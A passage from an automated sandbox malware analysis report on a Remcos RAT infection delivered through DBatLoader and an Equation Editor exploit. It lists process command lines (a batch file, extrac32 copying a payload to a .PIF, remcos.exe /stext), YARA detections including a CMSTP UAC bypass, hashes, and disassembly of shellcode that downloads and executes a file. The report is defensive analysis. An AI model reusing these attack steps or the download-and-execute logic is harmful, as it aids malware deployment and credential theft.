                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:07:42:06
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" "
                                                                                                                                                                                  Imagebase:0x49e00000
                                                                                                                                                                                  File size:302'592 bytes
                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:07:42:06
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\hjc.exe C:\\Users\\Public\\Libraries\\Rdxcjsng.PIF
                                                                                                                                                                                  Imagebase:0x120000
                                                                                                                                                                                  File size:53'248 bytes
                                                                                                                                                                                  MD5 hash:4D306ED01994EDF577B98FD59BF269C0
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:07:42:07
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.848171681.00000000157EB000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:07:42:17
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Users\Public\Libraries\Rdxcjsng.PIF
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\Public\Libraries\Rdxcjsng.PIF"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.395322214.0000000000729000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.399844258.0000000014D2B000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000002.396855031.00000000031D1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:07:42:20
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\qrvhclucfnyufuwghezckwpljsyrzdsj"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:07:42:21
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\amas"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                  Start time:07:42:21
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:543'304 bytes
                                                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                  Start time:07:42:21
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\dgnkdwq"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                  Start time:07:42:28
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000011.00000002.432128684.0000000003321000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.436864812.000000001588B000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.431190937.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                  Start time:07:42:31
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\pisbdjmsvpzm"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                  Start time:07:42:31
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\skxtebeuixrzqiq"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                  Start time:07:42:31
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cecmfupoefjdsweembv"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                  Start time:07:42:37
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.469944205.000000001550B000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000017.00000002.465177486.00000000030A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                  Start time:07:42:51
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Users\Public\Libraries\Rdxcjsng.PIF
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\Public\Libraries\Rdxcjsng.PIF"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.471719434.0000000014E7B000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                  Start time:07:42:59
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000019.00000002.493989881.0000000003191000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.496351890.00000000158EB000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:17.4%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                    Signature Coverage:60.8%
                                                                                                                                                                                    Total number of Nodes:153
                                                                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                                                                    execution_graph 801 3540295 802 3540280 801->802 805 35403aa ExitProcess 802->805 808 35403c3 805->808 809 35403c9 808->809 829 35403df 809->829 812 3540418 813 3540451 LoadLibraryW 812->813 814 354046b 11 API calls 813->814 815 3540458 814->815 816 35404c9 815->816 817 35404c0 8 API calls 815->817 818 35404ee 3 API calls 816->818 819 354047c URLDownloadToFileW 817->819 820 35404e0 818->820 823 35404d9 5 API calls 819->823 822 35404e8 ShellExecuteW 820->822 826 3540398 820->826 824 3540513 ExitProcess 822->824 823->816 827 3540507 824->827 827->826 828 3540516 ExitProcess 827->828 830 35403e5 829->830 869 3540406 830->869 832 3540458 833 35404c0 8 API calls 832->833 839 35404c9 832->839 835 354047c URLDownloadToFileW 833->835 834 3540451 LoadLibraryW 836 354046b 11 API calls 834->836 838 35404d9 5 API calls 835->838 836->832 838->839 841 35404ee 3 API calls 839->841 843 35404e0 841->843 842 354043c 19 API calls 844 3540418 842->844 845 35404e8 ShellExecuteW 843->845 847 35403d0 843->847 844->834 846 3540513 ExitProcess 845->846 848 3540507 846->848 847->812 847->813 847->815 850 354043c 847->850 848->847 849 3540516 ExitProcess 848->849 851 354043e 850->851 852 3540443 LoadLibraryW 851->852 853 3540451 15 API calls 851->853 855 354046b 11 API calls 852->855 853->852 856 3540458 855->856 857 35404c9 856->857 860 35404c0 8 API calls 856->860 858 35404ee 3 API calls 857->858 859 35404e0 858->859 861 35404e8 ShellExecuteW 859->861 866 354054d 859->866 862 354047c URLDownloadToFileW 860->862 863 3540513 ExitProcess 861->863 865 35404d9 5 API calls 862->865 867 3540507 863->867 865->857 866->812 867->866 868 3540516 ExitProcess 867->868 870 3540409 869->870 871 354043c 19 API calls 870->871 872 3540418 LoadLibraryW 871->872 874 354046b 11 API calls 872->874 875 3540458 874->875 876 35404c9 875->876 879 35404c0 8 API calls 875->879 877 35404ee 3 API calls 876->877 878 35404e0 877->878 880 35404e8 ShellExecuteW 878->880 885 35403ec 878->885 881 354047c URLDownloadToFileW 879->881 882 3540513 ExitProcess 880->882 884 35404d9 5 API calls 881->884 886 3540507 882->886 884->876 885->832 885->834 885->842 886->885 887 3540516 ExitProcess 886->887 896 3540277 899 3540280 896->899 897 35403aa 32 API calls 898 3540398 897->898 899->897 900 35400d0 901 35400e6 900->901 903 3540356 901->903 904 3540280 903->904 905 35403aa 32 API calls 904->905 906 3540398 905->906 906->901 724 354043c 725 354043e 724->725 726 3540443 LoadLibraryW 725->726 743 3540451 LoadLibraryW 725->743 758 354046b 726->758 731 35404c9 791 35404ee 731->791 735 35404e8 ShellExecuteW 797 3540513 735->797 740 354054d 741 3540507 741->740 742 3540516 ExitProcess 741->742 744 354046b 11 API calls 743->744 745 3540458 744->745 748 35404c0 8 API calls 745->748 754 35404c9 745->754 746 35404ee 3 API calls 747 35404e0 746->747 749 35404e8 ShellExecuteW 747->749 755 354054d 747->755 750 354047c URLDownloadToFileW 748->750 751 3540513 ExitProcess 749->751 753 35404d9 5 API calls 750->753 756 3540507 751->756 753->754 754->746 755->726 756->755 757 3540516 ExitProcess 756->757 759 354046e 758->759 760 35404c0 8 API calls 759->760 761 354047c URLDownloadToFileW 760->761 763 35404d9 5 API calls 761->763 764 35404c9 763->764 765 35404ee 3 API calls 764->765 766 35404e0 765->766 767 35404e8 ShellExecuteW 766->767 769 3540458 766->769 768 3540513 ExitProcess 767->768 770 3540507 768->770 769->731 772 35404c0 URLDownloadToFileW 769->772 770->769 771 3540516 ExitProcess 770->771 773 35404c9 772->773 774 35404d9 5 API calls 772->774 775 35404ee 3 API calls 773->775 774->773 776 35404e0 775->776 777 354047c URLDownloadToFileW 776->777 778 35404e8 ShellExecuteW 776->778 782 35404d9 777->782 779 3540513 ExitProcess 778->779 780 3540507 779->780 780->777 781 3540516 ExitProcess 780->781 783 35404db 782->783 784 35404e0 783->784 785 35404ee 3 API calls 783->785 786 35404e8 ShellExecuteW 784->786 788 354054d 784->788 785->784 787 3540513 ExitProcess 786->787 789 3540507 787->789 788->731 789->788 790 3540516 ExitProcess 789->790 792 35404f1 ShellExecuteW 791->792 793 3540513 ExitProcess 792->793 794 3540507 792->794 793->794 795 35404e0 794->795 796 3540516 ExitProcess 794->796 795->735 795->740 798 3540516 ExitProcess 797->798 799 354051a GetPEB 800 3540528 799->800 931 3540140 933 35400dd 931->933 932 354016b 933->932 934 3540356 32 API calls 933->934 934->933 935 3540160 936 35400f1 935->936 937 3540356 32 API calls 936->937 937->936

                                                                                                                                                                                    Callgraph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                    callgraph 0 Function_03540295 36 Function_035403AA 0->36 1 Function_03540356 1->36 2 Function_035400D0 2->1 3 Function_03540451 4 Function_03540513 3->4 8 Function_035404D9 3->8 11 Function_035404C0 3->11 33 Function_035404EE 3->33 37 Function_0354046B 3->37 5 Function_03540593 6 Function_035403DF 6->4 6->5 6->8 10 Function_03540406 6->10 6->11 25 Function_0354043C 6->25 6->33 6->37 7 Function_0354035F 7->36 8->4 8->33 9 Function_0354051A 14 Function_03540542 9->14 10->4 10->8 10->11 10->25 10->33 10->37 11->4 11->8 11->33 12 Function_03540140 12->1 13 Function_03540000 15 Function_035403C3 15->4 15->5 15->6 15->8 15->11 15->25 15->33 15->37 16 Function_0354028E 16->36 17 Function_03540308 17->36 18 Function_03540289 18->36 19 Function_035402CA 19->36 20 Function_0354020B 20->1 21 Function_035402B5 21->36 22 Function_03540376 22->36 23 Function_03540277 23->36 24 Function_03540172 24->1 25->3 25->4 25->8 25->11 25->33 25->37 26 Function_0354027C 26->36 27 Function_035402BC 27->36 28 Function_0354027E 28->36 29 Function_035401BB 29->1 30 Function_03540160 30->1 31 Function_03540323 31->36 32 Function_03540363 32->36 33->4 34 Function_0354012F 35 Function_03540328 35->36 36->15 37->4 37->8 37->11 37->33

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 035403C3 Relevance: 6.1, APIs: 4, Instructions: 147libraryfilenetworkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 35403c3-35403d1 call 3540593 call 35403df 5 3540424-3540442 0->5 6 35403d4 0->6 7 3540445-354044f 5->7 6->7 8 35403d6-35403dc 6->8 12 3540451-354045d LoadLibraryW call 354046b 7->12 8->12 13 35403de-35403ed 8->13 14 354045f-3540470 12->14 20 35404cd-35404e6 call 35404ee 12->20 13->14 15 35403ef-35403f4 13->15 18 3540472-35404cb call 35404c0 URLDownloadToFileW call 35404d9 14->18 15->14 19 35403f6-35403fc 15->19 18->20 19->12 23 35403fe 19->23 29 354054d-3540559 20->29 30 35404e8-354050a ShellExecuteW call 3540513 20->30 23->18 26 3540400-3540421 call 354043c 23->26 26->5 33 354055c 29->33 30->33 49 354050c 30->49 37 3540564-3540568 33->37 38 354055e-3540562 33->38 42 354057d-354057f 37->42 43 354056a-354056e 37->43 38->37 41 3540570-3540577 38->41 46 3540579 41->46 47 354057b 41->47 48 354058f-3540590 42->48 43->41 43->42 46->42 47->42 50 3540581-354058a 47->50 49->42 51 354050e-3540518 ExitProcess 49->51 54 3540553-3540556 50->54 55 354058c 50->55 54->50 56 3540558 54->56 55->48 56->33
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(03540443), ref: 03540451
                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,0354047C,?,00000000,00000000), ref: 035404C2
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03540500
                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 03540518
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2508257586-0
                                                                                                                                                                                    • Opcode ID: 0a5f03d0e266d9af780f023f5610c2f489518bf5cb5e6640c817524eb7b89c5f
                                                                                                                                                                                    • Instruction ID: cd8fb6402939a59d765ea24754640ebd3d564a7097d6045f3282505f43ba394a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a5f03d0e266d9af780f023f5610c2f489518bf5cb5e6640c817524eb7b89c5f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 564167A680D3C12FDB1A97306D69695FF70BE53108F6D89CE92C60B0F3E2988505D767
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 035403DF Relevance: 6.1, APIs: 4, Instructions: 137libraryfilenetworkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 58 35403df-35403ed call 3540593 call 3540406 63 354045f-3540470 58->63 64 35403ef-35403f4 58->64 65 3540472-35404cb call 35404c0 URLDownloadToFileW call 35404d9 63->65 64->63 66 35403f6-35403fc 64->66 79 35404cd-35404e6 call 35404ee 65->79 69 3540451-354045d LoadLibraryW call 354046b 66->69 70 35403fe 66->70 69->63 69->79 70->65 72 3540400-354044f call 354043c 70->72 72->69 85 354054d-3540559 79->85 86 35404e8-354050a ShellExecuteW call 3540513 79->86 88 354055c 85->88 86->88 103 354050c 86->103 91 3540564-3540568 88->91 92 354055e-3540562 88->92 96 354057d-354057f 91->96 97 354056a-354056e 91->97 92->91 95 3540570-3540577 92->95 100 3540579 95->100 101 354057b 95->101 102 354058f-3540590 96->102 97->95 97->96 100->96 101->96 104 3540581-354058a 101->104 103->96 105 354050e-3540518 ExitProcess 103->105 108 3540553-3540556 104->108 109 354058c 104->109 108->104 110 3540558 108->110 109->102 110->88
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(03540443), ref: 03540451
